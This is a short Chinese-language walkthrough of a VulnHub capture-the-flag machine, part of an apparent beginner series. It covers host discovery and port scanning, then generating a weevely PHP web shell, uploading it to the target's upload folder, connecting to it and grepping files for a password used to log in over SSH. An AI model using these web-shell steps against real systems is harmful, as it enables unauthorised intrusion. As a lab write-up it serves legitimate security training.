前言
今晚的第二篇,没有什么要讲的,让我们好好的来排练一遍。
小编语:国庆七天的带妹系列文章已经第六篇了,也不知道哪位大佬带到妹子了,带不到妹子的师傅就留在宿舍学习吧,除了带妹系列的vulnhub,接下来退出更适合新手的duva教程,希望大家能够喜欢,喜欢之余,也希望大家能顺手转发,毕竟您的支持是我们最大的动力。
信息搜集
主机发现
netdiscover -r 192.168.43.0/24
端口扫描
nmap -A -p --T4 192.168.43.132
开始渗透
一个登陆页面,目录扫描肯定还有些东西
很快我们便可以得到第一个flag
以及一些关键的信息
当我开始尝试访问
http://192.168.43.132/uploaded_files/
时一直无法加载出页面,可能是需要我们登陆之后才能进行文件上传。
这里需要用到kali上的一个工具weevely,
参考链接http://www.freebuf.com/sectool/39765.html
如下命令
weevely generate shell/root/shell.php
然后访问
http://192.168.43.132/uploaded_files/shell.php
没有任何提示,说明此是shell.php已经成功上传,并且我也进行了访问
使用weevely进行连接
weevely http://192.168.43.132/uploaded_files/shell.php shell
权限提升
进入shell之后,我们需要相办法获取root,可以看到一波提示
使用如下命令
grep -rns technawi
对全部文件内容进行搜索,注意看一下帮助文档,会有参数的详细解释。
进行全局搜索确实是太耗时间了,这里就不截图了
最后我们便得到了密码,接下来就是使用用户名和密码进行ssh登陆了,拿到最后一个flag
总结
总结
这次呢,基本上也是一条主线下来,先获取web-shell,然后获取root的用户名和密码。
带妹是不可能带妹的,这辈子都不可能带妹的? 有人么?没人我要报警了?